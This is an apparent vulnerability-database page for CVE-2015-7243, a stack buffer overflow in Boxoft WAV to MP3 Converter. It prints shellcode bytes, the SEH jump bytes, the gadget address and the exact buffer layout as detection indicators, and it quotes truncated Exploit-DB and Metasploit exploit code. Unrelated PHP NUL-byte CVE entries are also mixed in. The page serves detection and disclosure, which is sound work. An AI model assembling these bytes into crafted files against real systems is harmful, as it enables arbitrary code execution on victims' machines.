CVE-2015-7243
published 2015-09-18CVE-2015-7243: Buffer overflow in Boxoft WAV to MP3 Converter allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a crafted…
PriorityP351high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
58.27%
99.0th percentile
Buffer overflow in Boxoft WAV to MP3 Converter allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a crafted WAV file.
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
\xeb\x06\x90\x90
bytes↗
\x31\xd2\xb2\x30\x64\x8b\x12\x8b\x52\x0c\x8b\x52\x1c\x8b\x42\x08\x8b\x72\x20\x8b\x12\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x31\xed\x8b\x34\xaf\x01\xc6\x45\x81\x3e\x46\x61\x74\x61\x75\xf2\x81\x7e\x08\x45\x78\x69\x74\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x68\x79\x74\x65\x01\x68\x6b\x65\x6e\x42\x68\x20\x42\x72\x6f\x89\xe1\xfe\x49\x0b\x31\xc0\x51\x50\xff\xd7
- →Trigger condition: a crafted WAV file exceeding 4000 bytes (specifically 4132-byte padding before SEH overwrite) causes a stack buffer overflow when converted to MP3 in Boxoft WAV to MP3 Converter. ↗
- →SEH-based exploit: look for the short-jump NOP sled pattern \xeb\x06\x90\x90 immediately followed by the P/P/R ROP gadget address 0x0040144c packed little-endian (\x4c\x14\x40\x00) within a WAV file opened by wavtomp3.exe. ↗
- →The Metasploit module drops a malicious WAV file (default name music.wav) with a null-byte bad-char constraint (\x00); monitor file-creation events for anomalously large WAV files written by non-audio applications. ↗
- →The exploit targets wavtomp3.exe version 1.1.0.0 specifically; the P/P/R gadget at 0x0040144c is only valid for that binary version — version fingerprinting of the process can confirm exploitation attempt. ↗
- →Buffer layout: 4132 bytes of padding + 4-byte nSEH (\xeb\x06 + 2 bytes) + 4-byte SEH (ROP gadget) + shellcode + ~5860 bytes of padding. Detect WAV files with this total size profile (~10000 bytes) submitted to the converter. ↗
- ·The P/P/R ROP gadget address 0x0040144c is hardcoded and specific to wavtomp3.exe version 1.1.0.0 only; the exploit will not work against version 1.0 without a different gadget address. ↗
- ·The Metasploit module targets Windows platform only and is a file-format (client-side) exploit requiring user interaction to open/convert the malicious WAV file. ↗
- ·Null byte (\x00) is a bad character for the payload; any shellcode used must avoid null bytes or the exploit will fail. ↗
CVSS provenance
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
vendor_redhat5.0MEDIUM
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-7f6c-6g42-4r9g: Buffer overflow in Boxoft WAV to MP3 Converter allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a
ghsa_unreviewed·2022-05-14
CVE-2015-7243 [HIGH] CWE-119 GHSA-7f6c-6g42-4r9g: Buffer overflow in Boxoft WAV to MP3 Converter allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a
Buffer overflow in Boxoft WAV to MP3 Converter allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a crafted WAV file.
Red Hat
php: pcntl_exec() accepts paths with NUL character
vendor_redhat·2015-05-14·CVSS 5.0
CVE-2015-4026 [MEDIUM] CWE-626 php: pcntl_exec() accepts paths with NUL character
php: pcntl_exec() accepts paths with NUL character
The pcntl_exec implementation in PHP before 5.4.41, 5.5.x before 5.5.25, and 5.6.x before 5.6.9 truncates a pathname upon encountering a \x00 character, which might allow remote attackers to bypass intended extension restrictions and execute files with unexpected names via a crafted first argument. NOTE: this vulnerability exists because of an incomplete fix for CVE-2006-7243.
It was found that certain PHP functions did not properly handle file names containing a NULL character. A remote attacker could possibly use this flaw to make a PHP script access unexpected files and bypass intended file system access restrictions.
Package: php (Red Hat Enterprise Linux 5) - Will not fix
Package: php53 (Red Hat Enterprise Linux 5) - Will not fix
Red Hat
php: regressions in 5.4+
vendor_redhat·2015-04-10·CVSS 5.0
CVE-2015-4025 [MEDIUM] CWE-626 php: regressions in 5.4+
php: regressions in 5.4+
PHP before 5.4.41, 5.5.x before 5.5.25, and 5.6.x before 5.6.9 truncates a pathname upon encountering a \x00 character in certain situations, which allows remote attackers to bypass intended extension restrictions and access files or directories with unexpected names via a crafted argument to (1) set_include_path, (2) tempnam, (3) rmdir, or (4) readlink. NOTE: this vulnerability exists because of an incomplete fix for CVE-2006-7243.
It was found that certain PHP functions did not properly handle file names containing a NULL character. A remote attacker could possibly use this flaw to make a PHP script access unexpected files and bypass intended file system access restrictions.
Package: php (Red Hat Enterprise Linux 5) - Not affected
Package: php53 (Red Hat Ente
Red Hat
php: move_uploaded_file() NUL byte injection in file name
vendor_redhat·2015-03-02·CVSS 5.0
CVE-2015-2348 [MEDIUM] CWE-626 php: move_uploaded_file() NUL byte injection in file name
php: move_uploaded_file() NUL byte injection in file name
The move_uploaded_file implementation in ext/standard/basic_functions.c in PHP before 5.4.39, 5.5.x before 5.5.23, and 5.6.x before 5.6.7 truncates a pathname upon encountering a \x00 character, which allows remote attackers to bypass intended extension restrictions and create files with unexpected names via a crafted second argument. NOTE: this vulnerability exists because of an incomplete fix for CVE-2006-7243.
It was found that PHP move_uploaded_file() function did not properly handle file names with a NULL character. A remote attacker could possibly use this flaw to make a PHP script access unexpected files and bypass intended file system access restrictions.
Statement: This issue does not affect the current php and php53 pac
No detection rules found.
Exploit-DB
Boxoft WAV to MP3 Converter 1.1 - Buffer Overflow (Metasploit)
exploitdb·2018-07-03
CVE-2015-7243 Boxoft WAV to MP3 Converter 1.1 - Buffer Overflow (Metasploit)
Boxoft WAV to MP3 Converter 1.1 - Buffer Overflow (Metasploit)
---
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule "Boxoft WAV to MP3 Converter v1.1 Buffer Overflow",
'Description' => %q{
This module exploits a stack buffer overflow in Boxoft WAV to MP3 Converter versions 1.0 and 1.1.
By constructing a specially crafted WAV file and attempting to convert it to an MP3 file in the
application, a buffer is overwritten, which allows for running shellcode.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Robbie Corley', # EDB POC
'Shelby Pace' # Metasploit Module
],
'References' =>
[
[ 'CVE', '2015-7243' ],
[ 'EDB', '38035' ]
],
'Platform' => 'win',
'Targets' =>
[
[
'Boxoft WAV to MP3
Exploit-DB
Boxoft WAV to MP3 Converter - 'convert' Local Buffer Overflow
exploitdb·2015-08-31
CVE-2015-7243 Boxoft WAV to MP3 Converter - 'convert' Local Buffer Overflow
Boxoft WAV to MP3 Converter - 'convert' Local Buffer Overflow
---
#Exploit Title: Boxoft wav to mp3 converter SEH bypass technique tested on Win7x64
# Date: 8-31-2015
# Software Link: http://www.boxoft.com/wav-to-mp3/
# Exploit Author: Robbie Corley
# Contact: [email protected]
# Website:
# Target: Windows 7 Enterprise x64
# CVE:
# Category: Local Exploit
#
# Description:
# A buffer overflow was found after constructing a .wav payload over 4000 characters and attempting to convert the payload to a .mp3 file
my $buff = "\x41" x 4132;
#my $nseh = "\x42" x 4;
#my $seh = "\x43" x 4;
my $endofbuff = "\x41" x 5860;
$nseh = "\xeb\x06\x90\x90"; # jump to shellcode
$seh = pack('V',0x0040144c); # pop pop retn
#MessageBox Shellc0de
#https://www.exploit-db.com/exploits/28996/
my $shellcode
Metasploit
Boxoft WAV to MP3 Converter v1.1 Buffer Overflow
metasploit
Boxoft WAV to MP3 Converter v1.1 Buffer Overflow
Boxoft WAV to MP3 Converter v1.1 Buffer Overflow
This module exploits a stack buffer overflow in Boxoft WAV to MP3 Converter versions 1.0 and 1.1. By constructing a specially crafted WAV file and attempting to convert it to an MP3 file in the application, a buffer is overwritten, which allows for running shellcode.
http://packetstormsecurity.com/files/133377/Boxoft-WAV-To-MP3-Converter-Buffer-Overflow.htmlhttp://packetstormsecurity.com/files/137277/Boxoft-Wav-To-MP3-Converter-1.0-Buffer-Overflow.htmlhttps://www.exploit-db.com/exploits/38035/https://www.exploit-db.com/exploits/44971/http://packetstormsecurity.com/files/133377/Boxoft-WAV-To-MP3-Converter-Buffer-Overflow.htmlhttp://packetstormsecurity.com/files/137277/Boxoft-Wav-To-MP3-Converter-1.0-Buffer-Overflow.htmlhttps://www.exploit-db.com/exploits/38035/https://www.exploit-db.com/exploits/44971/
2015-09-18
Published